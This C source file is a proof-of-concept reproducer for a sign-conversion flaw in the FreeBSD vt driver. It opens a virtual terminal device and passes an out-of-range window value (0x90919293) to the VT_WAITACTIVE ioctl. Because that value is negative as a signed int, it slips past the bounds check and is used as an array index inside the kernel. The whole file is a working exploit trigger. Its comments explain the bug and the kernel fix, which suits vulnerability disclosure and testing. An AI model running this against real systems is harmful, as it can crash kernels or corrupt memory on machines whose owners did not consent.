#include <sys/consio.h>
#include <sys/ioctl.h>

#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
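/*
 * Reproducer for the sign-conversion flaw in the FreeBSD vt driver's
 * VT_WAITACTIVE ioctl that the banner below names.
 *
 * argv[1] is the path of a virtual terminal device (for example
 * /dev/ttyv1). The program opens it read-only and issues one
 * VT_WAITACTIVE request whose argument is outside the valid window range.
 *
 * Exit status: EXIT_FAILURE when the argument is missing or the device
 * cannot be opened; 0 once the ioctl has been issued, whatever it
 * returned. An ioctl error is reported through perror() only.
 */
int main(int argc, char **argv)
{
    /*
     * 0x90919293 has its top bit set, so it is negative when interpreted
     * as a signed int. Per the original author's notes, the driver's
     * boundary check against VT_MAXWINDOWS (12) is a signed comparison,
     * so a negative value passes it and is ultimately used as an index
     * into the vd->vd_windows array. The kernel-side remedy for this
     * class of bug is to reject negative values (or compare as unsigned)
     * before the value is used as an index.
     */
    const unsigned int out_of_range_window = 0x90919293u;
    int fd;

    printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n");

    if (argc < 2) {
        /* Usage text is a diagnostic, so it goes to stderr. */
        fprintf(stderr, "\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n");
        fprintf(stderr, "\nExample: ./poc_vt /dev/ttyv1\n\n");
        return EXIT_FAILURE;
    }

    fd = open(argv[1], O_RDONLY);
    if (fd == -1) {
        perror("open");
        return EXIT_FAILURE;
    }

    /*
     * The request takes its argument by value in the pointer-sized ioctl
     * slot; go through uintptr_t so the integer-to-pointer conversion is
     * explicit and zero-extended.
     * NOTE(review): a kernel that validates the argument is expected to
     * make this call fail, in which case perror() prints the reason;
     * confirm against the release under test.
     */
    if (ioctl(fd, VT_WAITACTIVE, (void *)(uintptr_t)out_of_range_window) == -1) {
        perror("ioctl");
    }

    (void)close(fd);
    return 0;
}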